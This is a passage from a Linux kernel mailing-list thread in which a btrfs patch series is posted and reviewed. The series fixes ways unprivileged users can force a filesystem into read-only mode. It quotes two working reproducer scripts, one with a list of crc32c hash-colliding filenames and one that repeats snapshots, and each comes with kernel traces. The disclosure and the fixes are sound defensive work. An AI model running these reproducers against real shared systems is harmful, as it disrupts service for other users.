fs/btrfs/uuid-tree.c | 5 +----
1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/fs/btrfs/uuid-tree.c b/fs/btrfs/uuid-tree.c
index f24c14b9bb2f..7942d3887515 100644
--- a/fs/btrfs/uuid-tree.c
+++ b/fs/btrfs/uuid-tree.c
@@ -35,7 +35,7 @@ static int btrfs_uuid_tree_lookup(struct btrfs_root *uuid_root, const u8 *uuid,
struct btrfs_key key;
if (WARN_ON_ONCE(!uuid_root))
- return -ENOENT;
+ return -EINVAL;
path = btrfs_alloc_path();
if (!path)
@@ -92,9 +92,6 @@ int btrfs_uuid_tree_add(struct btrfs_trans_handle *trans, const u8 *uuid, u8 typ
if (ret != -ENOENT)
return ret;
- if (WARN_ON_ONCE(!uuid_root))
- return -EINVAL;
-
btrfs_uuid_to_key(uuid, type, &key);
path = btrfs_alloc_path();
--
2.47.2
* [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision()
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (3 preceding siblings ...)
2026-02-26 14:34 ` [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add() fdmanana
@ 2026-02-26 14:34 ` fdmanana
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
2026-02-26 23:10 ` Qu Wenruo
6 siblings, 0 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:34 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
We're under the IS_ERR() branch so we know that 'ret', which got assigned
the value of PTR_ERR(di) is always negative, so there's no point in
checking if it's negative.
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/dir-item.c | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/fs/btrfs/dir-item.c b/fs/btrfs/dir-item.c
index 085a83ae9e62..84f1c64423d3 100644
--- a/fs/btrfs/dir-item.c
+++ b/fs/btrfs/dir-item.c
@@ -253,9 +253,7 @@ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir_ino,
/* Nothing found, we're safe */
if (ret == -ENOENT)
return 0;
-
- if (ret < 0)
- return ret;
+ return ret;
}
/* we found an item, look for our name in the item */
--
2.47.2
* Re: [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
@ 2026-02-26 18:55 ` Boris Burkov
2026-02-26 21:24 ` Filipe Manana
0 siblings, 1 reply; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 18:55 UTC (permalink / raw)
To: fdmanana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 02:33:58PM +0000, fdmanana@kernel.org wrote:
> From: Filipe Manana <fdmanana@suse.com>
>
> If we attempt to create several files with names that result in the same
> hash, we have to pack them in the same dir item, and that has a limit
> inherent to the leaf size. However, if we reach that limit, we trigger a
> transaction abort and turn the filesystem into RO mode. This allows a
> malicious user to disrupt a system without needing administration
> privileges/capabilities.
>
> Reproducer:
>
> $ cat exploit-hash-collisions.sh
> #!/bin/bash
>
> DEV=/dev/sdi
> MNT=/mnt/sdi
>
> # Use the smallest node size to make the test faster and require fewer
> # file names that result in a hash collision.
> mkfs.btrfs -f --nodesize 4K $DEV
> mount $DEV $MNT
>
> # List of names that result in the same crc32c hash for btrfs.
> declare -a names=(
> 'foobar'
> '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
> 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
> 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
> 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:'
> 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
> 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
> 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
> 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
> 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
> 'Ono7avN5GjC:_6dBJ_'
> 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
> 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
> 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
> 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
> 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
> 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
> 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
> 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
> 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
> 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
> 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
> 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
> 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
> 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
> 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
> '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
> 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
> '9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
> )
>
> # Now create files with all those names in the same parent directory.
> # It should not fail since a 4K leaf has enough space for them.
> for name in "${names[@]}"; do
> touch $MNT/$name
> done
>
> # Now add one more file name that causes a crc32c hash collision.
> # This should fail, but it should not turn the filesystem into RO mode
> # (which could be exploited by malicious users) due to a transaction
> # abort.
> touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
>
> # Check that we are able to create another file, with a name that does not cause
> # a crc32c hash collision.
> echo -n "hello world" > $MNT/baz
>
> # Unmount and mount again, verify file baz exists and with the right content.
> umount $MNT
> mount $DEV $MNT
> echo "File baz content: $(cat $MNT/baz)"
>
> umount $MNT
>
> When running the reproducer:
>
> $ ./exploit-hash-collisions.sh
> (...)
> touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
> ./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
> cat: /mnt/sdi/baz: No such file or directory
> File baz content:
>
> And the transaction abort stack trace in dmesg/syslog:
>
> $ dmesg
> (...)
> [758240.509761] ------------[ cut here ]------------
> [758240.510668] BTRFS: Transaction aborted (error -75)
> [758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
> [758240.513513] Modules linked in: btrfs dm_zero (...)
> [758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> [758240.524621] Tainted: [W]=WARN
> [758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> [758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
> [758240.527093] Code: 0f 82 cf (...)
> [758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
> [758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
> [758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
> [758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
> [758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
> [758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
> [758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
> [758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
> [758240.537517] Call Trace:
> [758240.537828] <TASK>
> [758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
> [758240.538760] path_openat+0x111a/0x15b0
> [758240.539252] do_filp_open+0xc2/0x170
> [758240.539699] ? preempt_count_add+0x47/0xa0
> [758240.540200] ? __virt_addr_valid+0xe4/0x1a0
> [758240.540800] ? __check_object_size+0x1b3/0x230
> [758240.541661] ? alloc_fd+0x118/0x180
> [758240.542315] do_sys_openat2+0x70/0xd0
> [758240.543012] __x64_sys_openat+0x50/0xa0
> [758240.543723] do_syscall_64+0x50/0xf20
> [758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> [758240.545397] RIP: 0033:0x7f1959abc687
> [758240.546019] Code: 48 89 fa (...)
> [758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
> [758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
> [758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
> [758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
> [758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
> [758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
> [758240.570758] </TASK>
> [758240.571040] ---[ end trace 0000000000000000 ]---
> [758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
> [758240.572899] BTRFS info (device sdi state EA): forced readonly
>
> Fix this by checking for a hash collision, and whether adding a new name is
> possible, early in btrfs_create_new_inode() before we do any tree updates,
> so that we don't need to abort the transaction if we can not add the new
> name due to the leaf size limit.
>
> A test case for fstests will be sent soon.
>
> Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
This fix makes sense but I have two high level questions if you don't
mind:
I couldn't actually find the place EOVERFLOW is coming from.
My best guess is:
insert_with_overflow()
btrfs_insert_empty_item()
btrfs_insert_empty_items()
btrfs_search_slot()
search_leaf()
split_leaf()
if (extend && data_size + btrfs_item_size(l, slot) +
sizeof(struct btrfs_item) > BTRFS_LEAF_DATA_SIZE(fs_info))
return -EOVERFLOW;
Is that right? I am a bit confused how this doesn't get caught by the
check before the call to split leaf
i.e.,
if (leaf_free_space < ins_len) // ctree.c:1951
Also, would it theoretically be possible to extend the collision
handling to allow collisions to span leaves, or is there some reason that
is a complete no-go?
Regardless of the answers, this is well reasoned, well tested, and a
clear improvement so please add:
Reviewed-by: Boris Burkov <boris@bur.io>
> Signed-off-by: Filipe Manana <fdmanana@suse.com>
> ---
> fs/btrfs/inode.c | 19 +++++++++++++++++++
> 1 file changed, 19 insertions(+)
>
> diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
> index b9f1bd18ea62..9a26fc5a5263 100644
> --- a/fs/btrfs/inode.c
> +++ b/fs/btrfs/inode.c
> @@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
> int ret;
> bool xa_reserved = false;
>
> + if (!args->orphan && !args->subvol) {
> + /*
> + * Before anything else, check if we can add the name to the
> + * parent directory. We want to avoid a dir item overflow in
> + * case we have an existing dir item due to existing name
> + * hash collisions. We do this check here before we call
> + * btrfs_add_link() down below so that we can avoid a
> + * transaction abort (which could be exploited by malicious
> + * users).
> + *
> + * For subvolumes we already do this in btrfs_mksubvol().
> + */
> + ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
> + btrfs_ino(BTRFS_I(dir)),
> + name);
> + if (ret < 0)
> + return ret;
> + }
> +
> path = btrfs_alloc_path();
> if (!path)
> return -ENOMEM;
> --
> 2.47.2
>
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (4 preceding siblings ...)
2026-02-26 14:34 ` [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision() fdmanana
@ 2026-02-26 19:10 ` Boris Burkov
2026-02-26 21:18 ` Filipe Manana
2026-02-26 23:10 ` Qu Wenruo
6 siblings, 1 reply; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 19:10 UTC (permalink / raw)
To: fdmanana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 02:33:57PM +0000, fdmanana@kernel.org wrote:
> From: Filipe Manana <fdmanana@suse.com>
>
> We have a couple scenarios that regular users can exploit to trigger a
> transaction abort and turn a filesystem into RO mode, causing some
> disruption. The first 2 patches fix these, the remainder are just a few
> trivial cleanups.
Bug fixes and cleanups look good. No need to abort in these cases as you
have shown.
Reviewed-by: Boris Burkov <boris@bur.io>
But on the topic of security, or malicious users:
How is this sort of attack conceptually different from simply filling
up the filesystem with fallocates then doing random metadata operations
until we ENOSPC and go readonly?
What if the attacker also exploits the behavior of the extent
allocator to try to produce fragmentation-driven metadata ENOSPC
aborts?
Thanks,
Boris
>
> Filipe Manana (5):
> btrfs: fix transaction abort on file creation due to name hash collision
> btrfs: fix transaction abort when snapshotting received subvolumes
> btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> btrfs: remove pointless error check in btrfs_check_dir_item_collision()
>
> fs/btrfs/dir-item.c | 4 +---
> fs/btrfs/inode.c | 19 +++++++++++++++++++
> fs/btrfs/ioctl.c | 2 +-
> fs/btrfs/transaction.c | 18 +++++++++++++++++-
> fs/btrfs/uuid-tree.c | 5 +----
> 5 files changed, 39 insertions(+), 9 deletions(-)
>
> --
> 2.47.2
>
* Re: [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
@ 2026-02-26 20:40 ` Qu Wenruo
2026-02-26 21:30 ` Filipe Manana
0 siblings, 1 reply; 15+ messages in thread
From: Qu Wenruo @ 2026-02-26 20:40 UTC (permalink / raw)
To: fdmanana, linux-btrfs
On 2026/2/27 01:03, fdmanana@kernel.org wrote:
> From: Filipe Manana <fdmanana@suse.com>
>
> Currently a user can trigger a transaction abort by snapshotting a
> previously received snapshot a bunch of times until we reach a
> BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we
> can store in a leaf). This is very likely not common in practice, but
> if it happens, it turns the filesystem into RO mode. The snapshot, send
> and set_received_subvol and subvol_setflags (used by receive) don't
> require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user
> could use this to turn a filesystem into RO mode and disrupt a system.
>
> Reproducer script:
>
> $ cat test.sh
> #!/bin/bash
>
> DEV=/dev/sdi
> MNT=/mnt/sdi
>
> # Use smallest node size to make the test faster.
> mkfs.btrfs -f --nodesize 4K $DEV
> mount $DEV $MNT
>
> # Create a subvolume and set it to RO so that it can be used for send.
> btrfs subvolume create $MNT/sv
> touch $MNT/sv/foo
> btrfs property set $MNT/sv ro true
>
> # Send and receive the subvolume into snaps/sv.
> mkdir $MNT/snaps
> btrfs send $MNT/sv | btrfs receive $MNT/snaps
>
> # Now snapshot the received subvolume, which has a received_uuid, a
> # lot of times to trigger the leaf overflow.
> total=500
> for ((i = 1; i <= $total; i++)); do
> echo -ne "\rCreating snapshot $i/$total"
> btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
> done
> echo
>
> umount $MNT
>
> When running the test:
>
> $ ./test.sh
> (...)
> Create subvolume '/mnt/sdi/sv'
> At subvol /mnt/sdi/sv
> At subvol sv
> Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type
> Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system
> Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system
> Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system
> Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system
>
> And in dmesg/syslog:
>
> $ dmesg
> (...)
> [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!
> [251067.629212] ------------[ cut here ]------------
> [251067.630033] BTRFS: Transaction aborted (error -75)
> [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235
> [251067.632851] Modules linked in: btrfs dm_zero (...)
> [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> [251067.646165] Tainted: [W]=WARN
> [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]
> [251067.649984] Code: f0 48 0f (...)
> [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292
> [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3
> [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750
> [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820
> [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0
> [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5
> [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000
> [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0
> [251067.661972] Call Trace:
> [251067.662292] <TASK>
> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]
> [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]
> [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]
> [251067.665238] ? _raw_spin_unlock+0x15/0x30
> [251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs]
> [251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs]
> [251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs]
> [251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs]
> [251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs]
> [251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs]
> [251067.670093] ? count_memcg_events+0x6d/0x180
> [251067.670849] ? handle_mm_fault+0x1a0/0x2a0
> [251067.671652] __x64_sys_ioctl+0x92/0xe0
> [251067.672406] do_syscall_64+0x50/0xf20
> [251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> [251067.674096] RIP: 0033:0x7f2a495648db
> [251067.674812] Code: 00 48 89 (...)
> [251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
> [251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db
> [251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004
> [251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
> [251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910
> [251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006
> [251067.686524] </TASK>
> [251067.686972] ---[ end trace 0000000000000000 ]---
> [251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown
> [251067.689049] BTRFS info (device sdi state EA): forced readonly
> [251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction.
> [251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown
> [251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda
>
> Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the
> snapshot creation code when attempting to add the
> BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is ok because it's not critical
> and we are still able to delete the snapshot, as snapshot/subvolume
> deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see
> inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do
> send/receive operations since it always peeks the first root ID in the
> existing BTRFS_UUID_KEY_RECEIVED_SUBVOL (it could peek any since all
> snapshots have the same content), and even if the key is missing, it
> falls back to searching by the BTRFS_UUID_KEY_SUBVOL key.
>
> A test case for fstests will be sent soon.
>
> Fixes: dd5f9615fc5c ("Btrfs: maintain subvolume items in the UUID tree")
> Signed-off-by: Filipe Manana <fdmanana@suse.com>
> ---
> fs/btrfs/transaction.c | 16 ++++++++++++++++
> 1 file changed, 16 insertions(+)
>
> diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
> index 3112bd5520b7..1a0daf2c68fb 100644
> --- a/fs/btrfs/transaction.c
> +++ b/fs/btrfs/transaction.c
> @@ -1902,6 +1902,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
> ret = btrfs_uuid_tree_add(trans, new_root_item->received_uuid,
> BTRFS_UUID_KEY_RECEIVED_SUBVOL,
> objectid);
I'm just checking all other btrfs_uuid_tree_add() callsites, and
wondering if other call sites are also affected:
- _btrfs_ioctl_set_received_subvol()
Would this be affected too?
Thanks,
Qu
> + /*
> + * We are creating a lot of snapshots of the same root that was
> + * received (has a received UUID) and reached a leaf's limit for
> + * an item. We can safely ignore this and avoid a transaction
> + * abort. A deletion of this snapshot will still work since we
> + * ignore if an item with a BTRFS_UUID_KEY_RECEIVED_SUBVOL key
> + * is missing (see btrfs_delete_subvolume()). Send/receive will
> + * work too since it peeks the first root id from the existing
> + * item (it could peek any), and in case it's missing it
> + * falls back to search by BTRFS_UUID_KEY_SUBVOL keys.
> + * Creation of a snapshot does not require CAP_SYS_ADMIN, so
> + * we don't want users triggering transaction aborts, either
> + * intentionally or not.
> + */
> + if (ret == -EOVERFLOW)
> + ret = 0;
> if (unlikely(ret && ret != -EEXIST)) {
> btrfs_abort_transaction(trans, ret);
> goto fail;
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
@ 2026-02-26 21:18 ` Filipe Manana
2026-02-26 21:57 ` Boris Burkov
0 siblings, 1 reply; 15+ messages in thread
From: Filipe Manana @ 2026-02-26 21:18 UTC (permalink / raw)
To: Boris Burkov; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 7:09 PM Boris Burkov <boris@bur.io> wrote:
>
> On Thu, Feb 26, 2026 at 02:33:57PM +0000, fdmanana@kernel.org wrote:
> > From: Filipe Manana <fdmanana@suse.com>
> >
> > We have a couple scenarios that regular users can exploit to trigger a
> > transaction abort and turn a filesystem into RO mode, causing some
> > disruption. The first 2 patches fix these, the remainder are just a few
> > trivial cleanups.
>
> Bug fixes and cleanups look good. No need to abort in these cases as you
> have shown.
> Reviewed-by: Boris Burkov <boris@bur.io>
>
> But on the topic of security, or malicious users:
>
> How is this sort of attack conceptually different from simply filling
> up the filesystem with fallocates then doing random metadata operations
> until we ENOSPC and go readonly?
What makes you think that users causing an ENOSPC that triggers a
transaction abort isn't an issue?
If we know of any intentional way to trigger that, we should definitely fix it.
Even some weeks ago I fixed such a case reported by a user when
running bonnie++:
https://lore.kernel.org/linux-btrfs/SA1PR18MB56922F690C5EC2D85371408B998FA@SA1PR18MB5692.namprd18.prod.outlook.com/
We often see users reporting that sort of issue, but we don't know the
workloads, how to reproduce and the state of their fs most of the
time.
>
> What about if the attacker also exploits the behavior of the extent
> allocator to try to produce fragmentation driven metadata ENOSPCs
> aborts?
Do you know of a way to do that?
If you do, we should fix it.
No matter what a user does, especially a non-privileged user, it
should not trigger transaction aborts in an easy way (or anything else
bad, like memory leaks, use-after-frees, NULL pointer derefs, etc).
Thanks.
>
> Thanks,
> Boris
>
> >
> > Filipe Manana (5):
> > btrfs: fix transaction abort on file creation due to name hash collision
> > btrfs: fix transaction abort when snapshotting received subvolumes
> > btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> > btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> > btrfs: remove pointless error check in btrfs_check_dir_item_collision()
> >
> > fs/btrfs/dir-item.c | 4 +---
> > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > fs/btrfs/ioctl.c | 2 +-
> > fs/btrfs/transaction.c | 18 +++++++++++++++++-
> > fs/btrfs/uuid-tree.c | 5 +----
> > 5 files changed, 39 insertions(+), 9 deletions(-)
> >
> > --
> > 2.47.2
> >
* Re: [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 18:55 ` Boris Burkov
@ 2026-02-26 21:24 ` Filipe Manana
2026-02-26 21:29 ` Boris Burkov
0 siblings, 1 reply; 15+ messages in thread
From: Filipe Manana @ 2026-02-26 21:24 UTC (permalink / raw)
